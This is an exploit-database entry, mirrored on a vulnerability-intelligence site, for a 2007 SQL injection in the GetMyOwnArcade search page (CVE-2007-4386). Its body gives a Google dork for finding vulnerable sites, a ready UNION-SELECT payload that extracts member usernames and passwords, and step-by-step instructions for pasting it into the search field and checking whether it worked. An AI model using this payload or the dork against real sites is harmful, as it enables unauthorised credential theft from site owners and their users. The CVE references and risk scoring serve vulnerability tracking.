Lucene search
+L

GetMyOwnArcade - 'search.php?query' SQL Injection

🗓️ 16 Aug 2007 00:00:00Reported by RoXur777Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

'GetMyOwnArcade' search.php SQL Injection discovered by RoXur777 on August 11th 2007, allows obtaining member information using UNION-SELEC

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-4386
17 Aug 200722:00
cve
cvelist
Cvelist
CVE-2007-4386
17 Aug 200722:00
cvelist
euvd
EUVD
EUVD-2007-4369
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-4386
17 Aug 200722:17
nvd
prion
Prion
Sql injection
17 Aug 200722:17
prion
###############################################
### GetMyOwnArcade (search.php) ($query) SQL-Injection
###############################################
### Discovered By: RoXur777
### ***August 11th 2007
### Google-Dork: "Powered by GetMyOwnArcade"
###############################################
/*
* $query is not being filtered before getting passed to a query.
* Therefore, we can inject SQL code into the SQL-Query.
* Using UNION-SELECT we can obtain member information.
*/
###
##
#Straight-Forward:
#####################
### POST
### search.php
###"query=')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*"
#####################
###
##
#
If you did not understand the Straight-Forward version of the exploit then read this:
###
#
1) Use the search function on a GetMyOwnAracde site. (They are not always visible on index.php)
2) In the search field type:
#
#######
')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*
#######
#
3) Click Enter.
4) If exploitation was successful you should see usernames and passwords instead of the search results.
---
However if you see:
#
#######
Game search result for \')/**/union/**/.......
#######
#
That means that the exploit failed.
#

# milw0rm.com [2007-08-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Aug 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26
EPSS0.01015
33